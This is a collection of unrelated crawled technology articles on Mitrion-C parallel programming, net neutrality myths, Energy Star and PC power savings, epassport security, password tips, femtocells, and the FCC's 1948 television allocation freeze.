The trick that makes Mitrion-C work for parallel portability comes from an important asymmetry in parallelization. Though automatic parallelization without code re-writes is very hard to achieve, general automatic sequentialization is much, much easier. Trivially, operating systems have run multiple programs in parallel on sequential processors for many years. For efficient execution, there are of course many optimization considerations, but it is still much easier than automatic parallelization. This property is what we use to port Mitrion-C between platforms. Since the code is fully parallel from the start, we never parallelize at all, we only sequentialize. So for a cluster, instead of parallelizing outer-most loops, we sequentialize everything except the outer-most loops. And for a vector processor, we sequentialize everything except for the inner-most loops.
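The asymmetry Möhl describes can be seen in miniature: if a fully parallel program is modeled as a dataflow graph, "sequentializing" it amounts to picking any topological order of that graph, whereas recovering such a graph from arbitrary sequential code is the hard, unsolved direction. A sketch in Python (an illustration of the principle, not Mitrion's actual machinery):

```python
from graphlib import TopologicalSorter  # Python 3.9+

# Each instruction names the instructions whose results it consumes.
# This is the "fully parallel" view: any two instructions with no
# dependency path between them could execute at the same time.
dataflow = {
    "load_a": set(),
    "load_b": set(),
    "mul":    {"load_a", "load_b"},
    "add":    {"mul", "load_a"},
    "store":  {"add"},
}

# Sequentialization: any topological order is a valid serial schedule.
order = list(TopologicalSorter(dataflow).static_order())

# Every instruction runs only after all of its inputs are ready.
pos = {op: i for i, op in enumerate(order)}
assert all(pos[dep] < pos[op] for op, deps in dataflow.items() for dep in deps)
```

Producing one valid schedule is mechanical; efficient scheduling for a given target is where the real compiler work lies, but it is still far easier than inferring the graph from sequential code.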
HPCwire: So if you don’t have the parallelization problem, how can you handle the various memory architectures of multicore CPUs, GPGPUs and clusters, and so on?
Möhl: Our FPGA background has required us to consider these issues carefully from the start. FPGAs are usually connected to the system on data buses designed for devices with an order of magnitude less performance than FPGAs. So Mitrion-C was designed from the start to allow programmers to manage both memory latency and raw memory bandwidth in an effective manner. This issue will become increasingly important also for multicores and manycores, since increasing core counts without increasing clock-frequencies of data buses will put them in the same situation FPGAs have always been in.
Another important aspect comes from the diversity of FPGA cards. There are almost no two FPGA cards with the same memory sub-system, so we had to design Mitrion-C to have a memory model that addresses this from the start.
In Mitrion-C, there is no assumption of a single monolithic memory space. Instead, each collection may have its own address space, and different ones for different memory size and bandwidth requirements. This allows programmers to manually stage data from few, large and slow memories to many, small and fast memories in any number of levels. There are also several different built-in types for multi-dimensional data collections that let programmers specify what kind of access patterns a collection should permit. This helps the programmer in making correct and efficient programs, and also lets the compiler know what types of memory to place the data collection in. Of course, you can still write a program that requires more, larger or faster memories than a particular system has, but Mitrion-C will at least make you aware of what you demand of the system.
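The staging pattern described here, copying tiles of data from a large, slow memory into a small, fast one before computing on them, looks roughly like the following Python sketch (an illustration of the idea, not Mitrion-C syntax; the tile size stands in for the capacity of the fast memory):

```python
def staged_sum(big_array, tile_size=4):
    """Process a large 'slow' array in small tiles, as if each tile
    were first copied into a small, fast local memory."""
    total = 0
    for start in range(0, len(big_array), tile_size):
        fast_buffer = big_array[start:start + tile_size]  # stage in
        total += sum(fast_buffer)  # compute entirely on the fast copy
    return total

data = list(range(10))
assert staged_sum(data) == sum(data)
```

The payoff of making the staging explicit is that the programmer, and the compiler, always know which memory each access hits, instead of assuming one flat address space.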
HPCwire: Can the exact same Mitrion-C source code be compiled to any of target architectures?
Möhl: Yes. You will need to parameterize for the number of cores you want to run on in a cluster or multicore, or how much unrolling you want for loops in an FPGA, but other than that, the same code works without changes. However, not all algorithms will be efficient on all architectures, so the programmer will in some cases need to consider what platform to run the algorithms on, or change the algorithms to suit the available platform.
HPCwire: Mitrionics has focused on FPGA software development since its inception in 2001. What prompted the decision to target other architectures?
Möhl: Well, we are actually still focused on FPGAs. What prompted this is a customer interest in running Mitrion-C on standard processors and not only the Mitrion Virtual Processor. Customers want to be able to write an algorithm once and make efficient use of it on systems with and without FPGAs. They would also like to avoid having their code “locked in” to FPGAs. So we set up an experiment at Mitrionics to see what can be done with Mitrion-C on other platforms. And, as it turns out, very much can be done!
HPCwire: There are already a number of programming environments and languages that target multicore CPUs and GPGPUs and clusters. What does Mitrionics brings to the table?
Möhl: Three main things. First, Mitrion-C is a single, coherent language that maintains the same style of programming regardless of what platform you run it on. Programming languages like MPI, OpenMP, OpenCL and CUDA are really several different languages mixed together. There is the base-line C-code which is purely sequential, then there are added parts for clusters (in the case of MPI), multicores (in the case of OpenMP), or GPUs (in the case of OpenCL and CUDA). Often, you even have to combine them, such as with MPI+OpenMP. The additions introduce completely different ways of doing things than what the sequential C code does. They are not just added syntax in the sequential C paradigm. That means that you are really writing in several different languages at the same time, and need to learn them all to be able to do it properly. It also complicates the code dramatically.
Second, the fact that you have separate syntax for each architecture means that you need to re-write your code to move it between architectures. With our solution, software developers can make a single investment in writing code, and then use it on any architecture depending on what is optimal under current circumstances. With a universal programming language that can be used to target any architecture without changing syntax, it also becomes possible to explore the benefits and possibilities of different architectures much faster, in the end resulting in more efficient code.
Finally, and perhaps most tantalizing, is that the portability is not limited to the architectures that are popular today. History has seen a wide range of architectures — from the old scalar processors, vector processors, Thinking Machines, MasPar and SIMD, the Multi-Threaded Architecture, large shared memory machines, MPPs, and clusters to today’s FPGAs, GPUs, Cell, multicores and several others. Each new generation has required code re-writes. Though this is not yet proven, there is good hope that Mitrion-C would be efficient without re-writes on most of the historically popular parallel architectures. If that is the case, it bodes well for parallel architectures of the future too. Though we probably won’t be able to say “Never again!” to re-writes for all eternity, Mitrion-C holds the promise of dramatically reducing the number of re-writes we will need to do in the future.
The MIT SENSEable City Lab's Real Time Rome project aggregates data from cell phones to better understand urban dynamics in real time. By collecting location data from cell phone users, and speed and location data from bus and taxi fleets, the project aims to help Roman commuters make better decisions about their environment. "Imagine being able to avoid traffic congestion or knowing where people are congregating on a Saturday afternoon," said project director Carlo Ratti, director of the SENSEable City Lab. "In a worst-case scenario, such real-time systems could also make it easier to evacuate a city in case of emergency."
For more information on Real Time Rome, visit the Web site. -MIT | <urn:uuid:ac2cc628-64d9-4e33-8f52-e08338076438> | CC-MAIN-2017-09 | http://www.govtech.com/e-government/MIT-Project-Aggregates-Cell-Phone-Data.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170613.8/warc/CC-MAIN-20170219104610-00267-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.926498 | 140 | 2.921875 | 3 |
Regardless of where you stand on the net neutrality debate, one thing doesn’t help: misleading or confusing statements. Unfortunately there are plenty of them.
Net neutrality is an Internet ideal that will become possible if the Federal Communications Commission decides to reclassify Internet service providers from information services to telecommunications services. If the FCC reclassifies ISPs, it will be able to regulate them—and that could affect a push by ISPs to provide faster Internet service to Web companies willing to pay for the privilege.
Data-hungry Web companies like Netflix want the speed, and the ISPs want the money. Others, however, fear a pay-to-play scheme could put cash-strapped startup sites at a disadvantage.
Add the pro- and anti-regulation forces to this mix, and the rhetoric's flying in all directions on social media as well as in the news. We’ve teased out the facts behind five net neutrality myths. It won’t resolve the debate, but it’ll help you understand what’s really going on.
Myth #1: Net neutrality is ‘Obamacare for the Internet’
Republican Sen. Ted Cruz’s recent tweet making this comparison is more convenient than accurate. Obamacare is about access (to health care), while net neutrality is about quality (think speed) of access to the Internet. More to the point, it's about how to manage just the ISPs, not the Internet as a whole—no matter what conservatives say.
Myth #2: An 'open' and 'neutral' Internet are the same thing
Listen carefully to the use of "open" or "neutral" in this debate. The Internet has always been “open,” because anyone can use it for any application. The ISPs are the Internet gatekeepers facing possible regulation, and that's about remaining "neutral."
The term “network neutrality” was coined by Columbia law professor Tim Wu in 2003. The basic concept was that all Internet traffic should be allowed to flow freely regardless of what it is or where it comes from.
The Internet was a simpler place a decade ago, however. Now, in an age when consumers surf the web, Skype and watch Netflix simultaneously, ISPs face a demand for more bandwidth—and naturally, they want to be paid for providing it. Net neutrality proponents say a pay-to-play fast lane won't be neutral, and may be considered less open, because it will hamper companies that can't afford faster service.
Myth #3: Regulating ISPs is good (or bad) for users
Net neutrality advocates think regulating ISPs will level the playing field for Web entrepreneurs. On the other hand, ISPs and other critics are concerned that regulating the market would discourage future investments in Internet infrastructure.
AT&T CEO Randall Stephenson said recently that his company will “pause” investments in fiber networks until the net neutrality debate is over. In a less dramatic announcement, Comcast CEO Brian Roberts said his company agrees with Obama in principle but that “the unfortunate reality is the uncertainty it creates, investment uncertainty.”
There's no myth here. We simply don't know what ISPs will end up doing if they face regulation.
Myth #4: Without net neutrality, some Internet users will experience slower service
This isn't a myth either, but two different positions around the same fact. This is the fact: If ISPs offer faster service for some Web companies, the service for other companies will be slower by comparison.
The argument centers around a perception: Is slower bad, or just not as good as faster? Net neutrality advocates warn that if ISPs give some websites a fast lane for an extra fee, that's essentially downgrading service for all other websites. Opponents contend that service to all wouldn’t be downgraded, but those who paid extra would get better (faster) service.
Myth #5: President Obama has the final word on net neutrality
While the President’s opinion might hold more weight than yours or mine, it’s not binding. Since President Obama issued his statement supporting reclassification, the White House has reiterated that the ultimate decision will be in the hands of the independent FCC.
That means FCC Chairman Tom Wheeler is under a lot of pressure. His only official statement reflects that the commission is trying its best to end the years-long quest for net neutrality rules: “We must take the time to get the job done correctly, once and for all, in order to successfully protect consumers and innovators online.” A decision is expected in the near future.
This story, "Net Neutrality: Five Myths, and the Real Facts" was originally published by PCWorld. | <urn:uuid:06ee1600-be4f-467e-b735-4e8b317a02d7> | CC-MAIN-2017-09 | http://www.cio.com/article/2853420/internet/net-neutrality-five-myths-and-the-real-facts.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171463.89/warc/CC-MAIN-20170219104611-00143-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.948283 | 966 | 2.734375 | 3 |
Reducing power usage and cutting carbon emissions is probably the right thing to do for the future of the planet. But keep this is mind: Green is a powerful marketing term right now and cost-savings promises are part of the marketing pitch. Like all marketing promises, results vary. One example: The amount of money a typical consumer can save by using or powering down energy-efficient computers, printers and the like is often small—in the case of an up-to-date laptop, the energy savings add up to perhaps just $10 a year.
I'm no denier of climate change, but technology users should always be skeptical. Just because a cause seems worthy, accepting conventional wisdom at face value isn't smart. Energy conservation is no exception.
The purely economic benefits of power-saving lighting, heating and air conditioning systems dwarf the savings to be had by buying an "Energy Star PC," or simply turning off your electronic gear when not in use. Unless electricity gets much more expensive than it is—on average, most customers pay about 10 cents a kilowatt hour—those economics won't change.
Even more disillusioning was the recent news that the vaunted Energy Star certification program run jointly by the Department of Energy and the Environmental Protection Agency is deeply flawed. Unlike many government programs, Energy Star resonates in the minds of consumers, and there's no end of advertising and commentary that tells us to look for the familiar blue logo.
So when you learn that government auditors were able to win Energy Star certification by filing bogus applications for non-existent products made by non-existent companies, who wouldn't feel cynical?
Sleeping Computers and Saving Money
When a laptop or desktop computer is asleep, your work is in active memory, but the hard drives have stopped spinning, the display is dark and the microprocessor is idle. As a result, power use drops sharply.
A fully awake desktop system made in the last year or two uses some 60 watts of power, but consumes just three watts when asleep. Laptops use less power to begin with, perhaps 20 watts, and that drops to about 2 watts when the laptop is asleep, according to Bruce Nordman, a researcher at the Lawrence Berkeley National Laboratory.
Well, that sounds like it should save plenty of cash. But let's do the math.
To calculate energy use, multiply the watts by the hours used; divide the result by 1000 to calculate kilowatt hours and multiply that by 10 cents for the average cost of electricity. Do the same calculation for the sleep mode, but remember, your machine won't be asleep 24 hours a day. Instead, let's say that you'll let it sleep 16 hours a day. The result: annual savings of about $10. That's right, annual. The savings on a power-hungry desktop are greater, but still just about $33 a year.
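Working through that arithmetic for the two examples in this article (a 60-watt desktop that sleeps at 3 watts, and a 20-watt laptop that sleeps at 2 watts, each asleep 16 hours a day at 10 cents per kilowatt hour):

```python
def annual_savings(awake_watts, sleep_watts, sleep_hours_per_day=16,
                   dollars_per_kwh=0.10):
    """Dollars saved per year by sleeping instead of staying fully awake."""
    watts_saved = awake_watts - sleep_watts
    kwh_saved = watts_saved * sleep_hours_per_day * 365 / 1000
    return kwh_saved * dollars_per_kwh

laptop = annual_savings(awake_watts=20, sleep_watts=2)   # about $10.51
desktop = annual_savings(awake_watts=60, sleep_watts=3)  # about $33.29
```

That matches the figures above: roughly $10 a year for the laptop and $33 for the desktop.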
Meanwhile, screensavers not only don't save energy, they waste it. That's because those pretty designs and animations take a good deal of processing power, which in turn requires electricity.
I'm not saying don't put your PC or Macs to sleep. You should, because there's no reason to waste energy. But understand that you'll hardly notice the difference on your monthly power bill.
True Story of the Gas-Powered Alarm Clock
I've never been comfortable with the Energy Star system. It reminds me of a pre-school class in which everybody gets an A to be sure all of the kids have plenty of self esteem. Have you noticed that it seems almost impossible to find a more or less mainstream PC that doesn't have Energy Star certification?
So I wasn't altogether shocked when the Government Accountability Office issued a scathing and funny indictment of the program. Donning the mantle of investigative reporters, GAO staffers submitted applications for 20 or so fake products made by non-existent companies. Fifteen of those products passed muster with the Energy Star bureaucracy, including two that are so hilariously improbable it seems like a practical joke.
One was a heck of an invention, a gasoline-powered alarm clock, said to be the size of a small generator. "Product was approved by Energy Star without a review of the company Web site or questions of the claimed efficiencies," the GAO wrote. My other favorite: the room air cleaner. The product is depicted as "a space heater with a feather duster and fly strips attached."
This would be even funnier if taxpayers weren't paying for a program that steers well-meaning consumers to manufacturers who promise, but don't deliver, energy saving products. Or as Senator Susan Collins (R-Maine) who requested the audit put it in an interview with The New York Times: People "are ripped off twice," as consumers and as taxpayers.
The moral? Your skepticism: don't leave home without it.
San Francisco journalist Bill Snyder writes frequently about business and technology. He welcomes your comments and suggestions.
Femtocells sound vaguely like a cross between a Feynman diagram and a biology class, but they're the latest piece of gear that millions of people will soon want in their homes without having missed them before. A femtocell is a small cellular base station designed to provide superior, short-range, indoor cellular coverage in a home or office. The idea behind femtocells is simple: the hardware tries to capture the ease of setup of a Wi-Fi network while allowing seamless connectivity for existing cell phones.
Woojune Kim, the vice president of technology at Airvana, a mobile broadband and femtocell equipment maker, explained the thinking behind femtocells. "Can you take the economics of the last 10 to 20 years, where we're able to make very small wireless transmitters like Wi-Fi base stations—can you make cellular base stations small enough and at that price point so that each of us can have our personal base station?" The answer, after years of trying, is yes.
The compact base stations are a cheap way for mobile carriers to improve coverage, while remaining relatively inexpensive for consumers to get service outside a ground floor, in rural areas, or in places in which their carriers have fallen down in meeting their needs. (Yes, we're looking at you, AT&T, at least for now.)
Femtocells have been "coming next year" for at least four years, but after successful introductions in 2008 and 2009 in tests and initial rollouts, 2010 will be the first year for mass adoption. Analysts expect hundreds of thousands of units to be in place this year, with tens of millions sold each year by 2013 or 2014 worldwide.
Three US cellular operators have had an in-home base station strategy in place since an AT&T announcement in March. Sprint was first in 2008, followed by Verizon in 2009, and then, nearly a year later, AT&T. (T-Mobile chose a different tack than femtocells, which it recently discontinued for new customers after four years in operation.)
The reason for the femtocell delay to market was twofold: 1) cost, and 2) the message it sent to the market. Until last year, femtocells could cost $400 to $500 at retail; improvements in technologies combined with large orders have pushed retail pricing as low as $100 to $150, with carriers reportedly paying as little as $50 per unit with extremely large commitments.
The messaging side was equally important: a femtocell told a carrier's customers that the operator couldn't give them a good signal in the home. The rise in popularity of 3G smartphones among average users, starting with the iPhone but now far beyond it, has led to people being dissatisfied with in-home coverage, whether or not they blame the carrier for it.
Rob Riordan, an executive vice president at the Midwest cellular operator and local exchange carrier Cellcom, said that the femtocell message could be interpreted as "I offer you crappy service, and why don't you buy this box from me, and pay me more money." Cellcom will shortly start offering femtocells to businesses with a different proposition behind it.
AT&T's notorious San Francisco and New York 3G undercoverage provoked some unsurprisingly angry responses from residents who saw the company's femtocell as a way to get customers to pay to improve AT&T's network. See this New York Times article, with the provocative title, "Bringing You a Signal You’re Already Paying For," for instance.
But not everyone feels that way. The industry believes that in the first stage, there's a huge worldwide audience for people who are in the right circumstances: living where coverage isn't expected (either by region, topology, home building materials, or other factors), or isn't available (rural or out of territory). In such cases, a carrier becomes a white knight by having a cheap way to put their network in your home, even if it's at your expense.
"Nobody actually expects their cell phone to work in the basement, or in the elevator, or in any of those other unusual circumstances," said Picochip's Gothard.
The next stage for carriers with broadband offerings or partnerships will be far cheaper femtos built into equipment that they already provide, such as set-top boxes and modems. When the femto comes built-in, you won't feel line-item sticker shock.
The Case for Femtocells
Femtocells carry the same fundamental technology used in "macrocells," the large base stations deployed on towers and rooftops, but femtos are designed to fit in a package appropriate for a home. There are also microcells, used to build smaller cells in cities, and picocells, typically installed to improve coverage in office buildings, campuses, malls, and airports.
The larger siblings to femtocells pump out lots of power and cover relatively large areas, from a building to square miles. That works well for outdoor usage, but a macrocell is wasteful overkill to get a signal into a house or office.
Simon Saunders, the chairman of the industry group The Femto Forum, said, "The users that have the most marginal coverage actually occupy the biggest part of those [macro] networks." He noted that with every user moved to a femtocell, the network regains the bandwidth equivalent of 10 outdoor users.
Because carriers hold a finite amount of expensive spectrum licenses, the motivation is to reuse spectrum as much as possible by deploying small cells. Small cells haven't been affordable, however, so the countervailing business logic has been to make each cell as large as possible, covering people indoors and out, complete with the dropped calls, low data rates, and related problems that result.
That's why the home problem can be intractable. In many parts of the developed world and in some developing countries, homes are made of thick building materials, like stone, or modern materials, like the plaster-covered chicken wire that's prevalent in warm, dry US climates. Stone blocks signals and chicken wire turns a house into a kind of Faraday Cage that prevents signals from entering or leaving.
Andy Gothard, director of corporate marketing at wireless chipmaker Picochip, described using a macrocell to push service into homes near his own in Bath, England, as "trying to fill a cup by firing a fire hose through the window," the window being the only signal-permeable part of the home.
In researching residential metro-scale Wi-Fi network failures a couple of years ago, I came across Rio Rancho, New Mexico, where a provider from Michigan hadn't counted on the plaster-and-wire construction of Southwest homes. (The firm has since switched to WiMax and a different business model.)
Femtocells were, in part, an attempt to find an alternative to picocells, which were the smallest previous option. Picocells have all the requirements of a full macrocell, including special backhaul provisioning, air-conditioning, power feeds, and so on. Femtocells, in contrast, approach the wireless bandwidth problem from the bottom up, trying to provide a better experience than installing a Wi-Fi router, and only needing a few minutes to power up, establish a location lock and network communications, and be available for use. Airvana's Kim said that a femtocell can't be as perfect as a picocell, which is virtually indistinguishable from a macrocell, but that current femtocells are close enough to make no difference to most users.
Interference can be an issue between larger base stations and femtocells, with some clever work required to make sure that, for instance, someone placing a call inside a house that connects to a macrocell (if the number isn't whitelisted, as noted below) doesn't interfere with or receive interference from another caller connected to the home base station.
Phones attached to a femtocell burn far less power, too, possibly less than a comparable Wi-Fi connection, because the signal is strong and close. Cell phones tend to run down when they have to use higher power levels to punch through interference or reach distant cell base stations. | <urn:uuid:745ea575-74eb-4f77-a52b-b500126555b6> | CC-MAIN-2017-09 | https://arstechnica.com/gadgets/2010/06/small-is-beautiful-put-a-cell-in-your-house/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170253.67/warc/CC-MAIN-20170219104610-00439-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.954816 | 1,735 | 2.59375 | 3 |
Three industrial revolutions that have brought epic changes to the world of business are steam engines, mass production, and internet technology. Today, we are in the midst of what is often called the fourth industrial revolution – the convergence of physical things with the world of the internet: The Internet of Things (IoT). Let us give you three figures that show why the IoT creates challenges both long-term and immediate.
First, consider the number of IP-enabled devices such as cars, heating systems, or production machines: the research database of the analyst firm Machina Research projects around 14 billion of those connected things by 2022. Second, the ITU predicts that by 2015, 75 percent of the world's population will have internet access. And third, there is the omnipresent mobile revolution: according to the mobile forecast from Cisco's Visual Networking Index, more than 3 billion smartphones and tablets will be in use globally by 2017.
Managers need to envision the valuable new opportunities that become possible when the physical world is merged with the virtual world and where potentially every physical object can be both intelligent and networked. And, starting now, they must create the organizations and IoT-based business models that can turn these ideas into reality.
The IoT for the Extended Enterprise
Three challenges that have been regularly encountered in IoT projects
More White Papers, Infographics and Brochures | <urn:uuid:6cba055e-c8a2-4a60-951b-6dd07a8d64ad> | CC-MAIN-2017-09 | https://www.bosch-si.com/internet-of-things/iot-downloads/iot-strategy/iot-based-business-models-white-paper.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171608.86/warc/CC-MAIN-20170219104611-00491-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.927756 | 277 | 2.65625 | 3 |
All U.S. passports issued since June 2007 are electronic passports, or epassports, which have advanced digital security features. All epassports have a small gold logo printed on the cover. (See illustration at right)
The epassport is based on a contactless smart card chip embedded in the cover. Think of it as a computer with special security software inside your passport. Contactless refers to the fact that it is a wireless device, but it can only communicate over very short distances of an inch or two.
U.S. epassports do not use RFID tags (Radio Frequency IDentification), which are used mostly for simple, insecure object identification and tracking, such as monitoring the whereabouts of warehouse pallets and products.
How epassports work
The contactless smart card chip securely stores information and uses its computer to provide enhanced security that protects the privacy and safety of the passport holder.
When the government makes the epassport book, it places a digital version of the identifying information printed inside, including the photograph, on the epassport chip. The information is "signed" using a type of electronic seal, called a digital signature, which makes any alteration of the stored electronic data detectable.
Passport terminals at border control communicate with the epassport chip and check the “seal” to prove that the passport was issued by the U.S. government and that the information stored in the chip has not been changed.
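The sign-then-verify flow just described can be sketched in miniature. Real epassports use asymmetric (public-key) digital signatures under an international PKI; the Python sketch below substitutes a keyed hash as a simplified stand-in for the issuer's signature, purely to show how any change to the stored data breaks the seal:

```python
import hashlib
import hmac

# Stand-in for the issuing authority's signing key (illustrative only;
# real epassports use asymmetric keys, so verification does not require
# sharing a secret with the border terminal).
ISSUER_KEY = b"issuing-authority-secret"

def seal(data: bytes) -> bytes:
    """Compute a 'digital seal' over the passport data."""
    return hmac.new(ISSUER_KEY, data, hashlib.sha256).digest()

def verify(data: bytes, signature: bytes) -> bool:
    """Recompute the seal and compare; any change to the data breaks it."""
    return hmac.compare_digest(seal(data), signature)

record = b"DOE<<JOHN|1980-01-01|photo-bytes..."  # hypothetical chip contents
sig = seal(record)

print(verify(record, sig))                             # untampered: True
print(verify(record.replace(b"JOHN", b"JANE"), sig))   # altered data: False
```

Because only the issuing authority holds the signing key, a forger can neither produce a valid seal nor alter sealed data without detection.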
Several other U.S. epassport security features prevent anyone from “skimming” or reading data out of the passport without you knowing it, say by standing next to you with a special reader, for example.
1. There is a radio frequency shield in the passport cover, so it cannot be read or even detected by any reading device when it is closed.
2. The epassport chip is “locked” with a key that is unique to each epassport. The border agent must first physically open your passport book to get the printed key to access the chip’s stored information.
3. The smart card chip encrypts, or scrambles, the data before transmitting it to the passport terminal, making the information useless to any eavesdropper.
4. The epassport chip only communicates over very short distances of one or two inches once it has been opened and unlocked.
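The "printed key" in point 2 corresponds to what the ICAO specification calls Basic Access Control: the reader derives the chip-access key from fields printed in the passport's machine-readable zone, so the chip cannot be unlocked without physically opening the book. Here is a simplified, illustrative Python sketch of that derivation (the real scheme also appends check digits to each field and expands the hash into 3DES keys, omitted here):

```python
import hashlib

def derive_access_key(doc_number: str, birth_date: str, expiry_date: str) -> bytes:
    """Illustrative sketch: derive a chip-access key from printed MRZ fields.

    The real ICAO Basic Access Control scheme adds check digits and expands
    the SHA-1 seed into 3DES keys; this sketch keeps only the core idea that
    the key depends entirely on data printed inside the passport book.
    """
    mrz_info = (doc_number + birth_date + expiry_date).encode("ascii")
    return hashlib.sha1(mrz_info).digest()[:16]  # 16-byte key seed

# Hypothetical example values, not a real document:
key = derive_access_key("123456789", "800101", "250101")
print(len(key))  # 16
```

A reader that has not seen the printed page cannot reconstruct the key, which is why skimming a closed passport yields nothing useful.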
A more secure travel document
The epassport is a far more secure travel document than a traditional paper passport because it provides an additional way of authenticating the printed information against a sealed electronic copy.
It is virtually impossible to counterfeit an epassport, because no one can duplicate the authentic U.S. digital seal on the electronic data. Furthermore, any change to the chip information breaks the seal, so tampering is evident to a border agent. If stolen, your passport picture could be replaced by a fraudulent one on the printed data page, but the digital copy of your picture on the chip can’t be changed without detection.
The sealed digital photograph ensures that you, as the bearer of the passport, are indeed the person to whom it was issued. At passport control, border agents can compare the person, the printed page and the chip information. These all have to match to confirm the identity of the person presenting the passport.
Four things to remember about the epassport
– Based on smart card technology
– Virtually impossible to counterfeit
– Far more secure travel document than a traditional paper only passport
– Built-in digital security protects your privacy and safety | <urn:uuid:e888bcda-2ad8-4b4e-a3ae-8b3a9fb21742> | CC-MAIN-2017-09 | https://www.justaskgemalto.com/us/us-electronic-passport/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170925.44/warc/CC-MAIN-20170219104610-00487-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.915601 | 730 | 3.015625 | 3 |
Top 10 cyber security tips
High profile hacking incidents continue to make headlines around the world. The Target data breach that compromised 40 million customer accounts is still reverberating around the retail universe, and earlier this month a hacker organization targeted CNET, the popular technology and consumer electronics site. The group claims it obtained over a million usernames, passwords and email addresses.
If you run a business and have valuable customer data to protect or even if you just enjoy visiting sites online and shopping at ecommerce hubs and want to keep your personal information safe, you may worry about hacker attacks. But there are steps you can take to reduce the risk. Here are 10 ways to keep your personal or business information safer.
- Make sure your password is secure. Passwords are the first line of defense. Use a password that contains both upper and lowercase letters as well as numbers and special characters. The more complex your password is, the harder it is for hackers to compromise.
- Never use personal information in your password. It’s a bad idea to use your name or that of a spouse, child or pet as a password. The same is true of birthdays or phone numbers, as this information is also widely available via a Google search of your name.
- Make sure your OS software is up to date. Hackers continuously come up with new ways to infiltrate security systems, so it pays to make sure your operating system and browser have the latest security patches. When prompted to update your operating system software, take time to do it.
- Don’t leave your computer unattended when logged in to a site. It can be tempting to leave your browser open if you have to leave your PC for a few minutes, but that’s a golden opportunity for snoopers. Close all applications and log off before you step away.
- Create a "burner" email address. It’s a good idea to open a free email account with sites like Gmail that you can give out when you’re required to provide an email online or open an ecommerce account. You’ll avoid spam at your primary address and reduce vulnerability.
- Password-protect mobile devices. Many people don’t bother creating a password or PIN for their mobile phone or tablet, which is a big mistake. Like PCs, phones and tablets typically have sensitive account information on them that also needs to be kept safe.
- Use different passwords for all the registered sites you visit. Many people make the mistake of using the same password for all the sites they visit, but that means that a hacking incident on one site compromises all of their online accounts.
- Change passwords frequently. If you change your password frequently, you’ll decrease the likelihood that you’ll lose valuable information in a hacking incident. Aim for making a change to all registered passwords approximately every 30 days.
- Set your email to read plain text only. One way hackers target victims is to monitor when emails are opened by embedding an image that displays automatically. If you set your email to display plain text only, you can manually open emails from trusted senders.
- Don’t keep a password list. If you’re following good security practices, you’ll create strong passwords and change them frequently. But keeping an unencrypted list of passwords on your PC defeats the whole purpose.
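To put tips 1 and 2 into practice, a strong random password can be generated programmatically rather than invented by hand. The sketch below uses Python's standard-library `secrets` module; it is an illustration, not a tool mentioned in this article:

```python
import secrets
import string

SPECIALS = "!@#$%^&*()-_=+"

def generate_password(length: int = 16) -> str:
    """Generate a random password mixing upper- and lowercase letters,
    digits, and special characters, as recommended above."""
    alphabet = string.ascii_letters + string.digits + SPECIALS
    while True:
        pw = "".join(secrets.choice(alphabet) for _ in range(length))
        # Retry until at least one character from each class is present.
        if (any(c.islower() for c in pw) and any(c.isupper() for c in pw)
                and any(c.isdigit() for c in pw) and any(c in SPECIALS for c in pw)):
            return pw

print(generate_password())
```

Because `secrets` draws from the operating system's cryptographic random source, the result is unpredictable, unlike passwords built from names, birthdays, or phone numbers.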
With sites worldwide under threat by attacks from increasingly sophisticated hacking groups, it makes sense to be concerned about your data, whether you run a business or are a casual Internet user. Since passwords are the primary line of defense, focus on creating strong passwords, and make sure you change them approximately every 30 days.
Keeping track of your passwords manually can be a challenge if you use many different sites, so it may be in your best interest to explore an automated password management solution. But whether you manage your passwords yourself or rely on a partner, make sure you follow these 10 tips to improve security and avoid handing account information to hackers.
Bill Carey is Vice President of Marketing & Business Development at Siber Systems Inc., which offers the top-rated RoboForm Password Manager solution. Find out more about RoboForm at http://www.roboform.com. | <urn:uuid:e9cade97-8942-4a40-a00e-4b407736b8e7> | CC-MAIN-2017-09 | https://betanews.com/2014/07/25/top-10-cyber-security-tips/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170700.71/warc/CC-MAIN-20170219104610-00007-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.915971 | 859 | 2.578125 | 3 |
In September of 1948, the average high temperature in Washington, D.C., was 79.8 degrees Fahrenheit, off just a tick from the historical average of 80.7. So it’s ironic that September would go down in history as the month of the Big Freeze – at least in the television business.
The freeze referred to an FCC decision to halt spectrum allocations for television broadcasting. At the time, 108 stations were on the air, and demand was mounting for permission to beam moving pictures and sound over frequencies within the 50 to 294 MHz range, a prized swath notable for its ability to convey signals over wide ranges and to penetrate walls.
The FCC faced industry pressure to open up assignments on request rather than to create a structured approach that would unify channels across the country. It was an inflection point whose resolution would determine how a powerful medium would grow up, and the FCC realized the gravity of the moment. In September, the commission ordered a freeze on allocations for the next six months as it sorted through conflicting ideas for stewarding the nation's television system.
Nicknamed the Freeze of 1948, the moratorium would extend for nearly four years as the commission wrestled with a changing technology environment – color TV among the new influences – and as the Korean War diverted the government’s attention. In April 1952, the FCC finally released its Sixth Report and Order, spelling out a national scheme for allocating frequencies for television broadcasting and painstakingly explaining its reasoning.
“It has been urged in this proceeding that as a matter of policy we should abandon the concept of a nationwide table of channel assignments and permit applicants from any community to apply for the use of any channels provided certain general engineering criteria were met,” the Report and Order said. “Upon careful consideration of the record in this proceeding we are convinced that the public interest requires our adherence to the concept of a table of channel assignments as the most effective method for assuring a fair distribution of television service throughout this country.”
Thus was established the still-prevailing system for TV broadcasting in the U.S. Hallmarks included frequency blocks of 6 MHz for television signals, geographic exclusivity of assigned frequencies, provisions for guarding against interference and the reservation of certain frequencies for educational television.
